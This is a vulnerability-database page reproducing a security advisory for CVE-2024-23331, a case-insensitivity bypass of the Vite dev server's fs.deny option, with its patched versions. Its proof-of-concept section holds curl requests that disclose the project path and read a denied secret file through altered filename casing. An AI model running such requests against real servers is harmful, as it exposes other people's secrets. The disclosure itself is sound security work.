Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
osvGoogleOSV:GHSA-C24V-8RFC-W8VW
HistoryJan 19, 2024 - 9:58 p.m.

Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem

2024-01-1921:58:47
Google
osv.dev
6
vite dev server
fs.deny bypass
case-insensitive filesystems
picomatch
vulnerability
patch
impact

7 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

36.3%

JSON

Summary

Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 – with surface area reduced to hosts having case-insensitive filesystems.

Patches

Fixed in [email protected], [email protected], [email protected], [email protected]

Details

Since picomatch defaults to case-sensitive glob matching, but the file server doesn’t discriminate; a blacklist bypass is possible.

See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.

PoC

Setup

  1. Created vanilla Vite project using npm create vite@latest on a Standard Azure hosted Windows 10 instance.
  2. Created dummy secret files, e.g. custom.secret and production.pem
  3. Populated vite.config.js with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }

Reproduction

  1. curl -s http://20.12.242.81:5173/@fs//
    • Descriptive error page reveals absolute filesystem path to project root
  2. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
    • Discoverable configuration file reveals locations of secrets
  3. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
    • Secrets are directly accessible using case-augmented version of filename

Proof
Screenshot 2024-01-19 022736

Impact

Who

  • Users with exposed dev servers on environments with case-insensitive filesystems

What

  • Files protected by server.fs.deny are both discoverable, and accessible

Related

prion 2
osv 3
cvelist 2
github 2
cve 2
veracode 2
cgr 1
wolfi 1
githubexploit 1
prion
prion
Design/Logic Flaw
2024-01-19 20:15:00
Design/Logic Flaw
2023-06-01 17:15:00
osv
osv
CVE-2024-23331
2024-01-19 20:15:14
Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)
2023-06-06 02:01:39
CVE-2023-34092
2023-06-01 17:15:10
cvelist
cvelist
CVE-2024-23331 Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem
2024-01-19 19:43:17
CVE-2023-34092 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)
2023-06-01 16:29:51
github
github
Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem
2024-01-19 21:58:47
Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)
2023-06-06 02:01:39
cve
cve
CVE-2024-23331
2024-01-19 20:15:14
CVE-2023-34092
2023-06-01 17:15:10
veracode
veracode
Improper Access Control
2024-01-23 08:08:23
Arbitrary File Read
2023-06-16 06:19:17
cgr
cgr
CVE-2024-23331 vulnerabilities
2024-05-16 21:07:10
wolfi
wolfi
CVE-2024-23331 vulnerabilities
2024-05-16 21:07:10
githubexploit
githubexploit
Exploit for Use of Incorrectly-Resolved Name or Reference in Vitejs Vite
2024-01-20 08:46:11

7 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

36.3%

JSON
Related for OSV:GHSA-C24V-8RFC-W8VW
prion2osv3cvelist2github2cve2veracode2cgr1wolfi1githubexploit1